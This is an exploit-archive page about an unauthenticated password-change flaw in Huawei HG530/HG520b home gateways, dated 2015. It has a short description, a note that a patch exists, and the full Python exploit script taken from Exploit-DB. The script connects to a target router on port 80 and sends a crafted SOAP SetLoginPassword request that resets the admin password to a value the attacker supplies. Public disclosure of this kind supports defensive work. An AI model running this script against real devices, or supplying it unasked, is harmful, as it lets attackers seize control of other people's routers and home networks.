Huawei Home Gateway password change vulnerability

vendor:

Home Gateway

by:

Fady Mohamed Osman

7.5

CVSS

HIGH

Password Change Vulnerability

287

CWE

Product Name: Home Gateway

Affected Version From: UPnP/1.0 IGD/1.00

Affected Version To: UPnP/1.0 IGD/1.00

Patch Exists: YES

Related CWE: N/A

CPE: h:huawei:home_gateway

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: HG530 - HG520b

2015

Huawei Home Gateway password change vulnerability

A vulnerability in Huawei Home Gateway allows an attacker to change the password of the device without authentication. This vulnerability exists due to improper validation of the SOAP request sent to the device. An attacker can exploit this vulnerability by sending a specially crafted SOAP request to the device.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to update their devices to the latest version.

Source

Exploit-DB raw data:

#!/usr/bin/python

# Exploit Title: Huawei Home Gateway password change vulnerability
# Date: June 27, 2015
# Exploit Author: Fady Mohamed Osman (@fady_osman)
# Vendor Homepage: http://www.huawei.com/en/
# Software Link: N/A.
# Version: UPnP/1.0 IGD/1.00
# Tested on: HG530 - HG520b (Provided by TE-DATA egypt)
# Exploit-db : http://www.exploit-db.com/author/?a=2986
# Youtube : https://www.youtube.com/user/cutehack3r

import socket
import sys
import re

if len(sys.argv) !=3:
    print "[*] Please enter the target ip and the new password."
    print "[*] Usage : " + sys.argv[0] + " IP_ADDR NEW_PASS"
    exit()

# Create a TCP/IP socket
target_host = sys.argv[1]
new_pass = sys.argv[2]
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Connect the socket to the port where the server is listening
server_address = (target_host, 80)
print >>sys.stderr, '[*] Connecting to %s port %s' % server_address
sock.connect(server_address)
try:
    soap = "<?xml version=\"1.0\"?>"
    soap +="<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
    soap +="<s:Body>"
    soap +="<m:SetLoginPassword xmlns:m=\"urn:dslforum-org:service:UserInterface:1\">"
    soap +="<NewUserpassword>"+new_pass+"</NewUserpassword>"
    soap +="</m:SetLoginPassword>"
    soap +="</s:Body>"
    soap +="</s:Envelope>"
    message = "POST /UD/?5 HTTP/1.1\r\n"
    message += "SOAPACTION: \"urn:dslforum-org:service:UserInterface:1#SetLoginPassword\"\r\n"
    message += "Content-Type: text/xml; charset=\"utf-8\"\r\n"
    message += "Host:" + target_host + "\r\n"
    message += "Content-Length: " + str(len(soap)) + "\r\n"
    message += "Expect: 100-continue\r\n"
    message += "Connection: Keep-Alive\r\n\r\n"
    sock.send(message)
    data = sock.recv(1024)
    print "[*] Recieved : " + data.strip()
    sock.send(soap)
    data = sock.recv(1024)
    data += sock.recv(1024)
    print "[*] Done."
finally:
    sock.close()